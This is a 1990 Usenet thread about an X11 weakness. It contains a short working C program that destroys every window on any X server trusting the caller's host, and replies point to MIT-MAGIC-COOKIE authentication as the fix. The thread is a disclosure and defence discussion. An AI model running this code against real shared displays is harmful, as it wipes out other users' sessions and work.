randy@uokmax.ecn.uoknor.edu (Longshot) (02/09/90)
This is a potential problem, and I'm sure I'm not the first to find it: #include <X11/Xlib.h> #include <X11/Xutil.h> #include <stdio.h> main(argc,argv) int argc; char **argv; { Display *mydisplay; mydisplay = XOpenDisplay(""); if (!mydisplay) { fprintf(stderr,"Could not open display.\n"); exit(1); } XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay)); XCloseDisplay(mydisplay); } Needless to say, if you are on a host that is trusted to an X server, this small segment can wreck them. After this executes, ALL windows on the server bound to DISPLAY die quickly and completely. I first had someone run this from his X environment (an xterm running from twm), and then I ran it on an ascii terminal connected to a host that was trusted to the X server. Obviously, if a host is not permitted to a sever, this program will die, but here we run our servers on Suns and Mac II's, and most of the applications on our Encore, which is faster and can handle the load. The same Multimax averages 60-80 users during peak hours, any of which who know X could do this. Doesn't X keep some sort of identifier in a window structure or display structure that identifies the owner? This is nasty! Randy -- Randy J. Ray University of Oklahoma, Norman Campus (405)/325-5370 !chinet!uokmax!randy randy@uokmax.uucp randy@uokmax.ecn.uoknor.edu Flaming makes you feel better, sorta like popping the little plastic bubbles in packaging material. -Tim Perala
argv%turnpike@Sun.COM (Dan Heller) (02/09/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes: > This is a potential problem, and I'm sure I'm not the first to find it: > XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay)); > Needless to say, if you are on a host that is trusted to an X server, this > small segment can wreck them. > This is nasty! Patient: Doctor, it hurts when I do this. Doctor: Then don't do that. :-D dan ----------------------------------------------------------- O'Reilly && Associates argv@sun.com / argv@ora.com 632 Petaluma Ave, Sebastopol, CA 95472 800-338-NUTS, in CA: 800-533-NUTS, FAX 707-829-0104
stripes@eng.umd.edu (Joshua Osborne) (02/10/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes: >This is a potential problem, and I'm sure I'm not the first to find it: You arn't, and this isn't the worse (be clever... read the man pages for xterm). [...] >Needless to say, if you are on a host that is trusted to an X server, this >small segment can wreck them. [...] Don't trust any hosts. Get X11R4 and use MIT-COOKIE-1 (you need to start X with the -auth option, and use xauth, or the Xau lib functions to make yourself a .Xauthority file). Then you only need to trust 2 people, you and root. -- stripes@wam.umd.edu "Security for Unix is like Josh_Osborne@Real_World,The Mutitasking for MS-DOS" "The dyslexic porgramer" - Kevin Lockwood Who needs friends when you can sit alone in your room and drink?